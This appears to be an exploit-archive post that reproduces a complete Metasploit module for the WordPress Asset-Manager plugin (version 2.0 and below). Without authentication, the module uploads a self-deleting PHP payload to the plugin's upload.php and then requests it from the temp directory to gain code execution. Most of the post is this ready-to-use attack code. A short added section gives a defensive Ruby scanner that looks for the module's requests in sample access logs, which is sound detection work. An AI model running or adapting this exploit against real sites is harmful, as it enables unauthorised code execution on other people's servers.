WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. The plugin allows PHP file uploads: a user can upload a file to a temporary directory without authentication, which results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    # PHP stager that removes its own file after it has run (:unlink_self)
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart body; the plugin reads the upload from the "Filedata" field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # The plugin echoes the stored file name on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # Uploaded files land in the plugin's temp directory under wp-content/uploads
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
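Added detection example, not part of the original post or of the Metasploit module above: a Ruby scan over constructed Apache combined-format access log lines that looks for the request pair the module produces (a POST to asset-manager/upload.php, then a GET of a .php name under uploads/assets/temp from the same client). The log lines, the RFC 5737 addresses and the example.test referer are assumptions made up for the example.

```ruby
# Constructed sample in Apache "combined" log format; RFC 5737 documentation addresses.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [31/Dec/2012:09:20:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:20:05 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 41 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:20:06 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzwn.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.9 - - [31/Dec/2012:09:21:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/photo.jpg HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
  198.51.100.9 - - [31/Dec/2012:09:21:30 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 41 "http://example.test/wp-admin/" "Mozilla/5.0"
LOG

# Fields needed from a combined-format line: client IP, timestamp, method, path, status, referer.
LINE_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+)[^"]*" (?<status>\d{3}) \S+ "(?<referer>[^"]*)"/
# The two request paths the module uses, relative to whatever WordPress base URI is in use.
UPLOAD_RE   = %r{/wp-content/plugins/asset-manager/upload\.php\z}
TEMP_PHP_RE = %r{/wp-content/uploads/assets/temp/[^/]+\.php\z}

def parse_line(line)
  m = LINE_RE.match(line) or return nil
  { ip: m[:ip], time: m[:time], method: m[:method], status: m[:status].to_i,
    path: m[:path].split('?', 2).first, referer: m[:referer] }
end

# One alert per suspicious request. A POST to upload.php alone is only a lead
# (the plugin's own admin UI posts there too, with a wp-admin Referer). A GET of
# a .php name under uploads/assets/temp that returns 200 to a client that posted
# earlier is the module's second step and is reported as 'high'. Because the
# module's payload unlinks itself, the file may already be gone from disk; the
# log pair is often the only artefact left to find.
def detect_asset_manager_abuse(log_text)
  uploaders = {}   # ip => time of that client's most recent POST to upload.php
  alerts = []
  log_text.each_line do |raw|
    e = parse_line(raw.strip) or next
    if e[:method] == 'POST' && e[:path] =~ UPLOAD_RE
      uploaders[e[:ip]] = e[:time]
      sev = e[:referer].include?('/wp-admin/') ? 'low' : 'medium'
      alerts << { severity: sev, ip: e[:ip], time: e[:time], path: e[:path],
                  reason: 'POST to Asset-Manager upload.php' }
    elsif e[:method] == 'GET' && e[:path] =~ TEMP_PHP_RE
      sev = (uploaders.key?(e[:ip]) && e[:status] == 200) ? 'high' : 'medium'
      alerts << { severity: sev, ip: e[:ip], time: e[:time], path: e[:path],
                  reason: 'PHP file requested from Asset-Manager temp directory' }
    end
  end
  alerts
end

if __FILE__ == $0
  detect_asset_manager_abuse(SAMPLE_LOG).each { |a| puts "#{a[:severity].upcase} #{a[:ip]} #{a[:time]} #{a[:reason]}: #{a[:path]}" }
end
```

Run against a real access log by replacing SAMPLE_LOG with File.read of the log; the low-severity lead from a wp-admin referer still deserves a look if the site has no authenticated user active at that time.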